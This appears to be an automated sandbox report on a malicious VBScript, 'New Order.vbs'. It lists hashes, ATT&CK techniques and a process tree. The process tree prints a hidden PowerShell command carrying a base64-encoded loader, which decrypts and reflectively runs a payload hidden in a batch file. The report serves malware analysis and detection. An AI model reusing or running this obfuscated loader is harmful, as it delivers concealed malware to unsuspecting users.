a134c1c356f903af382d4578414a3b4d4d025b65e9754d4f7a67ba47ce2b554e

General

Target

New Order.vbs
Size

201KB
MD5

8341669f2343d4278582609720bfa160
SHA1

0f5b6a4a92d09c84dee81b5adfb2fd06d0164d87
SHA256

a134c1c356f903af382d4578414a3b4d4d025b65e9754d4f7a67ba47ce2b554e
SHA512

1fe7092e7237d7c35b56e4f0ebe6ac4f491b7e994154d0534425dd53a5f3817cb320234eae20e72e14600ae3b1f6481279c63756e1fe74af441411a343e4c3c2
SSDEEP

3072:hLURz9FVOOUU/wW4MoQB3zAyfHf91BIHLK/AFpVi8qgZ3Dxy4XXQNdDadKzM8KiH:hLyEyfHf7BIHL68qY3NHTkh

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1816	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1816	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1816	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1816	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1148 wrote to memory of 2588	1148	WScript.exe	28
PID 1148 wrote to memory of 2588	1148	WScript.exe	28
PID 1148 wrote to memory of 2588	1148	WScript.exe	28
PID 2588 wrote to memory of 2220	2588	cmd.exe	30
PID 2588 wrote to memory of 2220	2588	cmd.exe	30
PID 2588 wrote to memory of 2220	2588	cmd.exe	30
PID 2220 wrote to memory of 1816	2220	cmd.exe	32
PID 2220 wrote to memory of 1816	2220	cmd.exe	32
PID 2220 wrote to memory of 1816	2220	cmd.exe	32
PID 2220 wrote to memory of 1816	2220	cmd.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New Order.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1148
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\temp_script.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\temp_script.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2220
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRsYmlqaWUgPSBAJw0KJHVzZXJhYW1OYW1lIGFhbT0gJGVuYWFtdjpVU0VhYW1STkFNRWFhbTskeXBxYWFtID0gIkNhYW06XFVzZWFhbXJzXCR1YWFtc2VyTmFhYW1tZVxkd2FhbW0uYmF0YWFtIjtpZiBhYW0oVGVzdGFhbS1QYXRoYWFtICR5cHFhYW0pIHsgIGFhbSAgV3JpYWFtdGUtSG9hYW1zdCAiQmFhbWF0Y2ggYWFtZmlsZSBhYW1mb3VuZGFhbTogJHlwYWFtcSIgLUZhYW1vcmVncmFhbW91bmRDYWFtb2xvciBhYW1DeWFuO2FhbSAgICAkYWFtZmlsZUxhYW1pbmVzIGFhbT0gW1N5YWFtc3RlbS5hYW1JTy5GaWFhbWxlXTo6YWFtUmVhZEFhYW1sbExpbmFhbWVzKCR5YWFtcHEsIFthYW1TeXN0ZWFhbW0uVGV4YWFtdC5FbmNhYW1vZGluZ2FhbV06OlVUYWFtRjgpOyBhYW0gICBmb2FhbXJlYWNoYWFtICgkbGlhYW1uZSBpbmFhbSAkZmlsYWFtZUxpbmVhYW1zKSB7IGFhbSAgICAgYWFtICBpZiBhYW0oJGxpbmFhbWUgLW1hYWFtdGNoICdhYW1eOjo6IGFhbT8oLispYWFtJCcpIHthYW0gICAgIGFhbSAgICAgYWFtICBXcmlhYW10ZS1Ib2FhbXN0ICJJYWFtbmplY3RhYW1pb24gY2FhbW9kZSBkYWFtZXRlY3RhYW1lZCBpbmFhbSB0aGUgYWFtYmF0Y2hhYW0gZmlsZWFhbS4iIC1GYWFtb3JlZ3JhYW1vdW5kQ2FhbW9sb3IgYWFtQ3lhbjthYW0gICAgIGFhbSAgICAgYWFtICB0cnlhYW0geyAgIGFhbSAgICAgYWFtICAgICBhYW0gICAkZGFhbWVjb2RlYWFtZEJ5dGVhYW1zID0gW2FhbVN5c3RlYWFtbS5Db25hYW12ZXJ0XWFhbTo6RnJvYWFtbUJhc2VhYW02NFN0cmFhbWluZygkYWFtbWF0Y2hhYW1lc1sxXWFhbS5UcmltYWFtKCkpOyBhYW0gICAgIGFhbSAgICAgYWFtICAgICBhYW0kaW5qZWFhbWN0aW9uYWFtQ29kZSBhYW09IFtTeWFhbXN0ZW0uYWFtVGV4dC5hYW1FbmNvZGFhbWluZ106YWFtOlVuaWNhYW1vZGUuR2FhbWV0U3RyYWFtaW5nKCRhYW1kZWNvZGFhbWVkQnl0YWFtZXMpOyBhYW0gICAgIGFhbSAgICAgYWFtICAgICBhYW1Xcml0ZWFhbS1Ib3N0YWFtICJJbmphYW1lY3Rpb2FhbW4gY29kYWFtZSBkZWNhYW1vZGVkIGFhbXN1Y2NlYWFtc3NmdWxhYW1seS4iIGFhbS1Gb3JlYWFtZ3JvdW5hYW1kQ29sb2FhbXIgR3JlYWFtZW47ICBhYW0gICAgIGFhbSAgICAgYWFtICAgIFdhYW1yaXRlLWFhbUhvc3QgYWFtIkV4ZWNhYW11dGluZ2FhbSBpbmplYWFtY3Rpb25hYW0gY29kZWFhbS4uLiIgYWFtLUZvcmVhYW1ncm91bmFhbWRDb2xvYWFtciBZZWxhYW1sb3c7IGFhbSAgICAgYWFtICAgICBhYW0gICAgIGFhbUludm9rYWFtZS1FeHBhYW1yZXNzaWFhbW9uICRpYWFtbmplY3RhYW1pb25Db2FhbWRlOyAgYWFtICAgICBhYW0gICAgIGFhbSAgICBiYWFtcmVhazthYW0gICAgIGFhbSAgICAgYWFtICB9IGNhYW1hdGNoIGFhbXsgICAgYWFtICAgICBhYW0gICAgIGFhbSAgV3JpYWFtdGUtSG9hYW1zdCAiRWFhbXJyb3IgYWFtZHVyaW5hYW1nIGRlY2FhbW9kaW5nYWFtIG9yIGVhYW14ZWN1dGFhbWluZyBpYWFtbmplY3RhYW1pb24gY2FhbW9kZTogYWFtJF8iIC1hYW1Gb3JlZ2FhbXJvdW5kYWFtQ29sb3JhYW0gUmVkO2FhbSAgICAgYWFtICAgICBhYW0gIH07IGFhbSAgICAgYWFtICB9OyBhYW0gICB9O2FhbX0gZWxzYWFtZSB7ICBhYW0gICAgV2FhbXJpdGUtYWFtSG9zdCBhYW0iU3lzdGFhbWVtIEVyYWFtcm9yOiBhYW1CYXRjaGFhbSBmaWxlYWFtIG5vdCBhYW1mb3VuZGFhbTogJHlwYWFtcSIgLUZhYW1vcmVncmFhbW91bmRDYWFtb2xvciBhYW1SZWQ7IGFhbSAgIGV4YWFtaXQ7fTthYW1mdW5jdGFhbWlvbiBkYWFtaGJjYShhYW0kcGFyYWFhbW1fdmFyYWFtKXsJJGFhYW1lc192YWFhbXI9W1N5YWFtc3RlbS5hYW1TZWN1cmFhbWl0eS5DYWFtcnlwdG9hYW1ncmFwaGFhbXkuQWVzYWFtXTo6Q3JhYW1lYXRlKGFhbSk7CSRhYWFtZXNfdmFhYW1yLk1vZGFhbWU9W1N5YWFtc3RlbS5hYW1TZWN1cmFhbWl0eS5DYWFtcnlwdG9hYW1ncmFwaGFhbXkuQ2lwYWFtaGVyTW9hYW1kZV06OmFhbUNCQzsJYWFtJGFlc19hYW12YXIuUGFhbWFkZGluYWFtZz1bU3lhYW1zdGVtLmFhbVNlY3VyYWFtaXR5LkNhYW1yeXB0b2FhbWdyYXBoYWFteS5QYWRhYW1kaW5nTWFhbW9kZV06YWFtOlBLQ1NhYW03OwkkYWFhbWVzX3ZhYWFtci5LZXlhYW09W1N5c2FhbXRlbS5DYWFtb252ZXJhYW10XTo6RmFhbXJvbUJhYWFtc2U2NFNhYW10cmluZ2FhbSgnWDRnYWFtcWk4ejFhYW0zTVZCdGFhbWYyTTZEYWFtQXJ1WXZhYW1pYS9BWmFhbVJoeEFNYWFtVmtWamlhYW1FaEkxWWFhbT0nKTsJYWFtJGFlc19hYW12YXIuSWFhbVY9W1N5YWFtc3RlbS5hYW1Db252ZWFhbXJ0XTo6YWFtRnJvbUJhYW1hc2U2NGFhbVN0cmluYWFtZygnWVBhYW1TV3l6TGFhbUx2N1c2YWFtdGp5YXphYW1CTXZjUWFhbT09Jyk7YWFtCSRkZWNhYW1yeXB0b2FhbXJfdmFyYWFtPSRhZXNhYW1fdmFyLmFhbUNyZWF0YWFtZURlY3JhYW15cHRvcmFhbSgpOwkkYWFtcmV0dXJhYW1uX3ZhcmFhbT0kZGVjYWFtcnlwdG9hYW1yX3ZhcmFhbS5UcmFuYWFtc2Zvcm1hYW1GaW5hbGFhbUJsb2NrYWFtKCRwYXJhYW1hbV92YWFhbXIsIDAsYWFtICRwYXJhYW1hbV92YWFhbXIuTGVuYWFtZ3RoKTthYW0JJGRlY2FhbXJ5cHRvYWFtcl92YXJhYW0uRGlzcGFhbW9zZSgpYWFtOwkkYWVhYW1zX3ZhcmFhbS5EaXNwYWFtb3NlKClhYW07CSRyZWFhbXR1cm5fYWFtdmFyO31hYW1mdW5jdGFhbWlvbiB0YWFtbm1waihhYW0kcGFyYWFhbW1fdmFyYWFtKXsJJHZhYW1oYno9TmFhbWV3LU9iYWFtamVjdCBhYW1TeXN0ZWFhbW0uSU8uYWFtTWVtb3JhYW15U3RyZWFhbWFtKCwkYWFtcGFyYW1hYW1fdmFyKWFhbTsJJHV2YWFtZWd3PU5hYW1ldy1PYmFhbWplY3QgYWFtU3lzdGVhYW1tLklPLmFhbU1lbW9yYWFteVN0cmVhYW1hbTsJJGFhbXRjZGl0YWFtPU5ldy1hYW1PYmplY2FhbXQgU3lzYWFtdGVtLklhYW1PLkNvbWFhbXByZXNzYWFtaW9uLkdhYW1aaXBTdGFhbXJlYW0oYWFtJHZoYnphYW0sIFtJT2FhbS5Db21wYWFtcmVzc2lhYW1vbi5Db2FhbW1wcmVzYWFtc2lvbk1hYW1vZGVdOmFhbTpEZWNvYWFtbXByZXNhYW1zKTsJJGFhbXRjZGl0YWFtLkNvcHlhYW1UbygkdWFhbXZlZ3cpYWFtOwkkdGNhYW1kaXQuRGFhbWlzcG9zYWFtZSgpOwlhYW0kdmhiemFhbS5EaXNwYWFtb3NlKClhYW07CSR1dmFhbWVndy5EYWFtaXNwb3NhYW1lKCk7CWFhbSR1dmVnYWFtdy5Ub0FhYW1ycmF5KGFhbSk7fWZ1YWFtbmN0aW9hYW1uIHVrbGFhbWVvKCRwYWFtYXJhbV9hYW12YXIsJGFhbXBhcmFtYWFtMl92YXJhYW0pewkkbGFhbWk9W1N5YWFtc3RlbS5hYW1SZWZsZWFhbWN0aW9uYWFtLkFzc2VhYW1tYmx5XWFhbTo6KCdkYWFtYW9MJ1thYW0tMS4uLWFhbTRdIC1qYWFtb2luICdhYW0nKShbYmFhbXl0ZVtdYWFtXSRwYXJhYW1hbV92YWFhbXIpOwkkYWFtcHB1PSRhYW1saS5FbmFhbXRyeVBvYWFtaW50OwlhYW0kcHB1LmFhbUludm9rYWFtZSgkbnVhYW1sbCwgJGFhbXBhcmFtYWFtMl92YXJhYW0pO30kaGFhbW9zdC5VYWFtSS5SYXdhYW1VSS5XaWFhbW5kb3dUYWFtaXRsZSBhYW09ICR5cGFhbXE7JHlrYWFtdD1bU3lhYW1zdGVtLmFhbUlPLkZpYWFtbGVdOjphYW0oJ3R4ZWFhbVRsbEFkYWFtYWVSJ1thYW0tMS4uLWFhbTExXSAtYWFtam9pbiBhYW0nJykoJGFhbXlwcSkuYWFtU3BsaXRhYW0oW0VudmFhbWlyb25tYWFtZW50XTphYW06TmV3TGFhbWluZSk7YWFtZm9yZWFhYW1jaCAoJGFhbWF6cXN6YWFtIGluICRhYW15a3QpIGFhbXsJaWYgYWFtKCRhenFhYW1zei5TdGFhbWFydHNXYWFtaXRoKCdhYW06OiAnKWFhbSkJewkJYWFtJG90Y2thYW09JGF6cWFhbXN6LlN1YWFtYnN0cmlhYW1uZygzKWFhbTsJCWJyYWFtZWFrOwlhYW19fSRycWFhbWs9W3N0YWFtcmluZ1thYW1dXSRvdGFhbWNrLlNwYWFtbGl0KCdhYW1cJyk7JGFhbXhmbz10YWFtbm1waiBhYW0oZGhiY2FhbWEgKFtDYWFtb252ZXJhYW10XTo6RmFhbXJvbUJhYWFtc2U2NFNhYW10cmluZ2FhbSgkcnFrYWFtWzBdKSlhYW0pOyRnZGFhbW5wPXRuYWFtbXBqIChhYW1kaGJjYWFhbSAoW0NvYWFtbnZlcnRhYW1dOjpGcmFhbW9tQmFzYWFtZTY0U3RhYW1yaW5nKGFhbSRycWtbYWFtMV0pKSlhYW07dWtsZWFhbW8gJHhmYWFtbyAkbnVhYW1sbDt1a2FhbWxlbyAkYWFtZ2RucCBhYW0oLFtzdGFhbXJpbmdbYWFtXV0gKCdhYW0lKicpKWFhbTsNCidADQoNCiRmb2Vua3kgPSAkbGJpamllIC1yZXBsYWNlICdhYW0nLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZm9lbmt5DQo=')) | Invoke-Expression"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\temp_script.bat

Filesize
188KB

MD5
358c2ab0b5a4e9df1909daaff2660680

SHA1
510046ac3edef14eb6375c79caf54d4f097ba2c9

SHA256
f581fa02412a470527c76c8144625ef751591e6d4c1eb4e1038b802592367dd4

SHA512
62ed4b2c4be4904d88750330112c30d49e1ebfb26ea5ce1f9d222281fc3936f72bd843bf10fcb4da322a34d50f761f54731633a349aa4ae051c22893f3ac8321

Download Submit
memory/1816-13-0x00000000742E1000-0x00000000742E2000-memory.dmp

Filesize
4KB

Download
memory/1816-15-0x00000000742E0000-0x000000007488B000-memory.dmp

Filesize
5.7MB

Download
memory/1816-14-0x00000000742E0000-0x000000007488B000-memory.dmp

Filesize
5.7MB

Download
memory/1816-16-0x00000000742E0000-0x000000007488B000-memory.dmp

Filesize
5.7MB

Download
memory/1816-17-0x00000000742E0000-0x000000007488B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing